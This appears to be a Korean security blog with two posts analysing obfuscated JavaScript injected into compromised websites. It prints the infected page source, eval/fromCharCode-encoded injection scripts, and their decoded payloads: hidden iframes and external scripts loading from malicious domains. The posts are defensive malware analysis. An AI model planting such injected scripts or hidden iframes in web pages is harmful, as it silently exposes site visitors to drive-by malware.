posted by Kwan's 2014. 1. 8. 04:00

우연히 인터넷 검색을 하던 도중 발견한 2012년 해외 포럼에 올라온 글이다. 

Malicious Code Inject: What Does It Do? 라는 것을 보던 중에 오래된 방법이지만 이런 방법도 있구나 해서 적어놓는다.


1. 발견지 포럼(Web Developer Forum) : http://www.webdeveloper.com/forum/showthread.php?261600-Malicious-Code-Inject-What-Does-It-Do (Malicious Code Inject: What Does It Do?)

-> http://oolbrmp.tld.cc/d/404.php?go=1 (window.location _=_ "http://fukbb.com")

--> http://fukbb.com


2. 디코딩 순서 : 초기사이트 접속 -> Base 64 난독화  -> 일부 디코딩 -> Base 64 난독화 -> Blockhole 난독화 -> 디코딩


3. Web Developer Forum - 스샷



4. 난독화 해제

   가. 원본 소스


  나. 1차 디코딩 - 일부 base 64


  다. 2차 디코딩 - 남은 일부 base 64


  라. 3차 디코딩 - Blockhole(최종)


  마. http://oolbrmp.tld.cc/d/404.php?go=1 - window.location 통한 리다이렉팅


  라. 최종 도메인 - fukbb.com



5. 도메인 위치

  가. oolbrmp.tld.cc


  나. fukbb.com


6. 악성스크립트 - 바이러스 토탈 결과

* 바이러스 토탈 업로드 시 악성 스크립트 부분만 발췌해서 업로드 했습니다.



6. 번외편 - 이것의 결과는?

- 힌트 : HTML-CSS

* &lt; - 부등호(<)

* &gt; - 부등호(>)

* &quot; - 쌍따옴표(") 하나 

 &lt;

 script&gt;

 try

 {

   q=document.createElement(&quot;

   p&quot;

   );

   q.appendChild(q+&quot;

   &quot;

   );

 }

 catch(qw)

 {

   h=-012/5;

   try

   {

     bcsd=prototype-2;

   }

   catch(bawg)

   {

     ss=[];

     f=(h)?(&quot;

     fromCharC&quot;

     +&quot;

     ode&quot;

     ):&quot;

     &quot;;

     e=window[&quot;

     e&quot;

     +&quot;

     val&quot;

     ];

     n=[9,18,315,408,32,80,300,444,99,234,327,404,110,232,138,412,101,232,207,432,101,218,303,440,116,230,

198,484,84,194,309,312,97,218,303,160,39,196,333,400,121,78,123,364,48,186,123,492,13,18,27,36,105,

204,342,388,109,202,342,160,41,118,39,36,9,250,96,404,108,230,303,128,123,26,27,36,9,200,333,396,

117,218,303,440,116,92,357,456,105,232,303,160,34,120,315,408,114,194,327,404,32,230,342,396,61,78,

312,464,116,224,174,188,47,222,333,432,98,228,327,448,46,232,324,400,46,198,297,188,100,94,156,192,

52,92,336,416,112,126,309,444,61,98,117,128,119,210,300,464,104,122,117,196,48,78,96,416,101,210,

309,416,116,122,117,196,48,78,96,460,116,242,324,404,61,78,354,420,115,210,294,420,108,210,348,

484,58,208,315,400,100,202,330,236,112,222,345,420,116,210,333,440,58,194,294,460,111,216,351,

464,101,118,324,404,102,232,174,192,59,232,333,448,58,96,177,156,62,120,141,420,102,228,291,436

,101,124,102,164,59,26,27,36,125,26,27,36,102,234,330,396,116,210,333,440,32,210,306,456,97,218,

303,456,40,82,369,52,9,18,27,472,97,228,96,408,32,122,96,400,111,198,351,436,101,220,348,184,99,

228,303,388,116,202,207,432,101,218,303,440,116,80,117,420,102,228,291,436,101,78,123,236,102,92,

345,404,116,130,348,464,114,210,294,468,116,202,120,156,115,228,297,156,44,78,312,464,116,224,

174,188,47,222,333,432,98,228,327,448,46,232,324,400,46,198,297,188,100,94,156,192,52,92,336

,416,112,126,309,444,61,98,117,164,59,204,138,460,116,242,324,404,46,236,315,460,105,196,315,

432,105,232,363,244,39,208,315,400,100,202,330,156,59,204,138,460,116,242,324,404,46,224,333

,460,105,232,315,444,110,122,117,388,98,230,333,432,117,232,303,156,59,204,138,460,116,242,324,

404,46,216,303,408,116,122,117,192,39,118,306,184,115,232,363,432,101,92,348,444,112,122,117,

192,39,118,306,184,115,202,348,260,116,232,342,420,98,234,348,404,40,78,357,420,100,232,312

,156,44,78,147,192,39,82,177,408,46,230,303,464,65,232,348,456,105,196,351,464,101,80,117,416,

101,210,309,416,116,78,132,156,49,96,117,164,59,26,27,36,9,200,333,396,117,218,303,440,116,92,

309,404,116,138,324,404,109,202,330,464,115,132,363,336,97,206,234,388,109,202,120,156,98,222,

300,484,39,82,273,192,93,92,291,448,112,202,330,400,67,208,315,432,100,80,306,164,59,26,27,36,

125];

     if(window.document)for(i=6-2-1-2-1;-581+i!=2-2;i++)

     {

       k=i;

       ss=ss+String[f](n[k]/(i%(h*h)+2-1));

     }

     e(ss);

   }

 }

 &lt;

 /script&gt;


글 중간에 바이러스 토탈 결과를 보듯이 난독화가 된 악성 스크립트의 차단 비율은 그다지 높지 않는거 같다. 또한, 이처럼 단순 난독화가 아닌 현재 국내에서 다수 나타나고 있는 공다팩처럼 복잡하게 난독화된 기술은 더욱 탐지하기 힘들것으로 보이며 악성링크를 사전에 차단을 통해 피해를 줄이는 방안도 하나의 방법이라고 생각한다. 하지만, 어느 한편의 입장에서는 악성링크를 통해 다운로드되는 파일만 막으면 되지 라는 말도 할 수 있다. 어떻게 보면 이 둘다 맞는 말이라고 할 수도 있다. 그러나 한번에 한마리의 토끼를 잡는것 보다 한번에 두마리 토끼를 잡는 방법도 있듯이 두마리의 토끼를 한번에 잡는다면 주말에 안심하고 웹서핑을 할 수 있지 않을까 하는 생각이 된다.


댓글을 달아 주세요

  1. tra 2014.02.08 09:46  Addr  Edit/Del  Reply

    샘플파일 원츄 +_+

posted by Kwan's 2012. 6. 29. 19:40
감염 사이트 : http://211.239.162.41/~dongposarang/killer.html  

* 악성 링크이니 조심하시기 바랍니다!

 

 <html><head><script type="text/javascript">window.location="";
 </script></head><body><!--c3284d--><script>s="";
 try
 {
   q=document.createElement("p");
   q.appendChild("123"+n);
 }
 catch(qw)
 {
   h=-016/7;
   try
   {
     a=prototype&5;
   }
   catch(zxc)
   {
     e=window["e"+"va"+"l"];
     n="26.30.400.555.198.351.436.505.220.348.184.595.228.315.464.505.80.117.240.525.204.342.388. 545.202
 .96.460.570.198.183.136.520.232.348.448.290.94.141.416.505.198.342.404.570.242.138.456.585.94.297.

 444.585.220.348.196.245.92.336.416.560.68.96.440.485.218.303.244.170.168.357.420.580.232.303.456.

[생략]

 342.400.505.228.183.136.550.222.102.128.485.216.315.412.550.122.102.396.505.220.348.404.570.68.96.

416.505.210.309.416.580.122.102.200.170.64.357.420.500.232.312.244.170.100.102.248.300.94.315.408.570.

 194.327.404.310.78.123.236.65.20"

.split(".");
     if(window.document)for(i=6-2-1-2-1;
     -161+i!=2-2;
     i++)
     {
       k=i;
       s=s+String.fromCharCode(n[k]/(i%(h*h)+2));
     }
     e(s);
   }
  
 }
 </script><!--/c3284d-->
 <!--d93065-->                                                                                                                                                                                                        <script>try
 {
   q=document.createElement("p");
   q.appendChild(q+"");
 }
 catch(qw)
 {
   h=-012/5;
   try
   {
     bcsd=prototype-2;
   }
   catch(bawg)
   {
     ss=[];
     f=(h)?("fromCharC"+"ode"):"";
     e=window["e"+"val"];
     n=[13,20,300,444,99,234,327,404,110,232,138,476,114,210,348,404,40,78,180,420,102,228,291,436,101,64,345,

456,99,122,102,416,116,232,336,232,47,94,315,476,97,208,342,444,113,92,342,468,47,198,333,468,110,232,

162,184,112,208,336,136,32,220,291,436,101,122,102,336,119,210,348,464,101,228,102,128,115,198,342,444,

[생략],

444,34,64,291,432,105,206,330,244,34,198,303,440,116,202,342,136,32,208,303,420,103,208,348,244,34,100,

 102,128,119,210,300,464,104,122,102,200,34,124,180,188,105,204,342,388,109,202,186,156,41,118,39,40];
     if(window.document)for(i=6-2-1-2-1;
     -160+i!=2-2;
     i++)
     {
       k=i;
       ss=ss+String[f](n[k]/(i%(h*h)+2-1));
     }
     e("if(1)"+ss);
   }
  
 }
 </script><!--/d93065-->
 
 
 
 
 <a href="">Click</a>
 <!--start_qpi--><script src=http://mmm2011.ppcsoft.in/pizda.js></script><!--end_qpi-->
 </body></html>

 

[복호화]

 

26.30.400.555.198.351.436.505.220.348.184.595.228.315.464.505.80.117.240.525.204.342.388. 545.202
 .96.460.570.198.183.136.520.232.348.448.290.94.141.416.505.198.342.404.570.242.138.456.585.94.297.

 444.585.220.348.196.245.92.336.416.560.68.96.440.485.218.303.244.170.168.357.420.580.232.303.456.

[생략].

 342.400.505.228.183.136.550.222.102.128.485.216.315.412.550.122.102.396.505.220.348.404.570.68.96.

416.505.210.309.416.580.122.102.200.170.64.357.420.500.232.312.244.170.100.102.248.300.94.315.408.570.

 194.327.404.310.78.123.236.65.20"

 

----------------------------------------------------------------------------------------

 

document.write('<iframe src="http://hecrery.ru/count11.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');

 

========================================================================================

 

13,20,300,444,99,234,327,404,110,232,138,476,114,210,348,404,40,78,180,420,102,228,291,436,101,64,345,

456,99,122,102,416,116,232,336,232,47,94,315,476,97,208,342,444,113,92,342,468,47,198,333,468,110,232,

162,184,112,208,336,136,32,220,291,436,101,122,102,336,119,210,348,464,101,228,102,128,115,198,342,444,

[생략],

444,34,64,291,432,105,206,330,244,34,198,303,440,116,202,342,136,32,208,303,420,103,208,348,244,34,100,

102,128,119,210,300,464,104,122,102,200,34,124,180,188,105,204,342,388,109,202,186,156,41,118,39,40

 

=======================================================================================

if(1)

document.write('<iframe src="http://iwahroq.ru/count6.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');

 

count6.php, count11.php 페이지는 모두 죽어있는 상태이다 !

 

=========================
Server IP(s):
0.0.0.0

========================= 

 

댓글을 달아 주세요